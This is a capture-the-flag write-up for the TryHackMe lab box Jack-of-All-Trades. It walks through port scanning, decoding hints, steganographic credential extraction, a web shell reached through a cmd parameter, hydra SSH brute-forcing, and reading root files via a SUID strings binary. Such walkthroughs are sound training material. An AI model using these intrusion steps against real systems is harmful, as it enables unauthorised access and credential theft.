Jack-of-All-Trades TryHackMe | write-up

Hello everyone, today's machine was a lot of fun to break; I enjoyed every step. The Jack-of-All-Trades CTF challenge box was created for the Securi-Tay conference, run on the 28th of February 2020 by the HackSoc.

Let's start with some enumeration!

root@kali:~# nmap -sC -sV 10.10.37.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-12 13:15 UTC
Nmap scan report for ip-10-10-37-180.eu-west-1.compute.internal (10.10.37.180)
Host is up (0.00079s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Jack-of-all-trades!
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 13:b7:f0:a1:14:e2:d3:25:40:ff:4b:94:60:c5:00:3d (DSA)
|   2048 91:0c:d6:43:d9:40:c3:88:b1:be:35:0b:bc:b9:90:88 (RSA)
|   256 a3:fb:09:fb:50:80:71:8f:93:1f:8d:43:97:1e:dc:ab (ECDSA)
|_  256 65:21:e7:4e:7c:5a:e7:bc:c6:ff:68:ca:f1:cb:75:e3 (ED25519)
MAC Address: 02:EC:EB:D2:86:84 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.36 seconds
root@kali:~# 

As we can see, we have two ports open: SSH on 80 and HTTP on 22. They switched the port numbers, which can be tricky if you don't pay attention. If we try to open the site in a browser, it tells us the request was cancelled for security purposes, because port 22 is normally used for something else (SSH), not HTTP.

I left a link at the end pointing to an article that explains how to fix this issue step by step.
root@kali:~# echo "UmVtZW1iZXIgdG8gd2lzaCBKb2hueSBHcmF2ZXMgd2VsbCB3aXRoIGhpcyBjcnlwdG8gam9iaHVudGluZyEgSGlzIGVuY29kaW5nIHN5c3RlbXMgYXJlIGFtYXppbmchIEFsc28gZ290dGEgcmVtZW1iZXIgeW91ciBwYXNzd29yZDogdT9XdEtTcmFxCg==" | base64 -d
Remember to wish Johny Graves well with his crypto jobhunting! His encoding systems are amazing! Also gotta remember your password: u?******q
root@kali:~# 

Later, while checking the web page's source code, I noticed a base64 string and a note for the user Jack in case he forgets his credentials. I visited the login page, but the credentials we have don't work. I tried to guess the user since he loves dinosaurs, and once I found the dinosaur's name, all I could read was stego! Let's download the images from the site and see what's hidden.

GQ2TOMRXME3TEN3BGZTDOMRWGUZDANRXG42TMZJWG4ZDANRXG42TOMRSGA3TANRVG4ZDOMJXGI3DCNRXG43DMZJXHE3DMMRQGY3TMMRSGA3DONZVG4ZDEMBWGU3TENZQGYZDMOJXGI3DKNTDGIYDOOJWGI3TINZWGYYTEMBWMU3DKNZSGIYDONJXGY3TCNZRG4ZDMMJSGA3DENRRGIYDMNZXGU3TEMRQG42TMMRXME3TENRTGZSTONBXGIZDCMRQGU3DEMBXHA3DCNRSGZQTEMBXGU3DENTBGIYDOMZWGI3DKNZUG4ZDMNZXGM3DQNZZGIYDMYZWGI3DQMRQGZSTMNJXGIZGGMRQGY3DMMRSGA3TKNZSGY2TOMRSG43DMMRQGZSTEMBXGU3TMNRRGY3TGYJSGA3GMNZWGY3TEZJXHE3GGMTGGMZDINZWHE2GGNBUGMZDINQ=

Base32 > Hex > Rot13
I found this in recovery.php. Decoding it leaves us with a hint: a link redirecting to the Wikipedia page for the dinosaur Stegosauria.
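As an added example (not part of the original write-up), here is the Base32 > Hex > Rot13 chain written out in Python, so you can see exactly what each stage consumes and produces. The function names and the sample blob are mine; the sample is a constructed value, not the blob from the box, and the decoder also tolerates whitespace and missing Base32 padding that copy-pasting often introduces.

```python
import base64
import codecs


def decode_chain(blob: str) -> str:
    """Reverse the Base32 > Hex > Rot13 chain from the write-up.

    Stage 1: Base32 text -> bytes that are ASCII hex digits.
    Stage 2: hex digits  -> bytes of the ROT13'd message.
    Stage 3: ROT13 is its own inverse, so apply it once more.
    """
    # Remove stray whitespace and restore '=' padding to a multiple of 8.
    clean = "".join(blob.split())
    clean += "=" * (-len(clean) % 8)
    hex_text = base64.b32decode(clean).decode("ascii")
    rot_text = bytes.fromhex(hex_text).decode("utf-8")
    return codecs.decode(rot_text, "rot_13")


def encode_chain(plaintext: str) -> str:
    """Forward chain (Rot13 > Hex > Base32); handy for building test input."""
    rot_text = codecs.encode(plaintext, "rot_13")
    hex_text = rot_text.encode("utf-8").hex()
    return base64.b32encode(hex_text.encode("ascii")).decode("ascii")


# Constructed sample (not the blob from the box):
# "Hi" -> ROT13 "Uv" -> hex "5576" -> Base32 "GU2TONQ=".
SAMPLE_BLOB = "GU2TONQ="

if __name__ == "__main__":
    print(decode_chain(SAMPLE_BLOB))                       # Hi
    print(decode_chain(encode_chain("constructed note")))  # constructed note
```

Paste the blob from recovery.php into decode_chain to reproduce the hint the write-up describes.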
root@kali:~/Desktop# steghide extract -sf stego.jpg 
Enter passphrase: 
wrote extracted data to "creds.txt".
root@kali:~/Desktop# cat creds.txt 
Hehe. Gotcha!

You're on the right path, but wrong image!
root@kali:~/Desktop#
Use the password you got from the base64 as the passphrase.
root@kali:~/Desktop# steghide extract -sf header.jpg 
Enter passphrase: 
wrote extracted data to "cms.creds".
root@kali:~/Desktop#

After I logged in, it sent us to this index.php file, which is very thirsty for commands!

After browsing the machine, I went to the home directory to check how many user directories we have, and something interesting caught my attention: a wordlist...

http://10.10.68.189:22/nnxhweOV/index.php?cmd=ls /home/

Let's do some brute-forcing and see if the password list we found still contains the password used by user Jack.

root@kali:~# hydra -l jack -P jack_pass.lst ssh://10.10.68.189:80/
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-12 15:07:07
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:1/p:25), ~2 tries per task
[DATA] attacking ssh://10.10.68.189:80/
[80][ssh] host: 10.10.68.189   login: jack   password: IT*************@
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-12 15:07:09
root@kali:~#
root@kali:~# ssh jack@10.10.68.189 -p 80
jack@10.10.68.189's password: 
jack@jack-of-all-trades:~$ ls
user.jpg
jack@jack-of-all-trades:~$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
User flag
Privilege escalation
jack@jack-of-all-trades:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/pt_chown
/usr/bin/chsh
/usr/bin/at
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/strings
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/procmail
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
jack@jack-of-all-trades:~$ 
/usr/bin/strings 👌

If you are not familiar with the strings command, it prints each sequence of printable characters found in a file. You can read more in the Linux manual with "man strings".

jack@jack-of-all-trades:~$ /usr/bin/strings /root/root.txt
ToDo:
1.Get new penguin skin rug -- surely they won't miss one or two of those blasted creatures?
2.Make T-Rex model!
3.Meet up with Johny for a pint or two
4.Move the body from the garage, maybe my old buddy Bill from the force can help me hide her?
5.Remember to finish that contract for Lisa.
6.Delete this: securi-tay2020_{********************************}
jack@jack-of-all-trades:~$

And we have the root flag! Happy hacking!
